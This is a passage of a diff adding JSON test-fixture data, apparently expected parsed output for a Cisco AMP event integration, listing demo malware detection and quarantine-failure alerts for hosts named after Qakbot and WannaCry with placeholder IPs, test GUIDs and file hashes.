+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"Auto.BAC7BC5281.in10.tht.Talos\",\"detection_id\":\"6411538569722068993\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\",\"sha1\":\"99fffe78e0cbd7b508eed13a8633903dd89ed5f1\",\"md5\":\"dc41e47ebba549ec5e616ed9e88a0376\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Detection",
+                "id": "6411538569722069000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "Auto.BAC7BC5281.in10.tht.Talos",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "f9:65:da:22:2a:41",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "f9:65:da:22:2a:41"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6411538569722068993",
+                    "event_type_id": 553648147
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T17:39:51.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843711565Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":812000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275399255031906\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419275399255032000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Object name not found",
+                        "error_code": 3221225524
+                    },
+                    "detection_id": "6419275399255031906",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T17:39:51.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843713424Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":297000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275399255031905\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419275399255032000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Delete pending",
+                        "error_code": 3221225558
+                    },
+                    "detection_id": "6419275399255031905",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T17:39:51.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843715300Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":297000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275399255031904\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419275399255032000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Object name not found",
+                        "error_code": 3221225524
+                    },
+                    "detection_id": "6419275399255031904",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T17:39:51.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843717182Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":297000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064606\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419275399255032000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Delete pending",
+                        "error_code": 3221225558
+                    },
+                    "detection_id": "6419275394960064606",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T17:39:51.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843719050Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064605\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419275399255032000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Delete pending",
+                        "error_code": 3221225558
+                    },
+                    "detection_id": "6419275394960064605",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T17:39:51.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843721187Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064607\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419275399255032000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Delete pending",
+                        "error_code": 3221225558
+                    },
+                    "detection_id": "6419275394960064607",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T17:39:51.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843723102Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064604\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419275399255032000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Delete pending",
+                        "error_code": 3221225558
+                    },
+                    "detection_id": "6419275394960064604",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T17:39:51.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843725006Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064603\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419275399255032000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Delete pending",
+                        "error_code": 3221225558
+                    },
+                    "detection_id": "6419275394960064603",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T17:39:51.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843726903Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064602\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419275399255032000",
+                "category": [
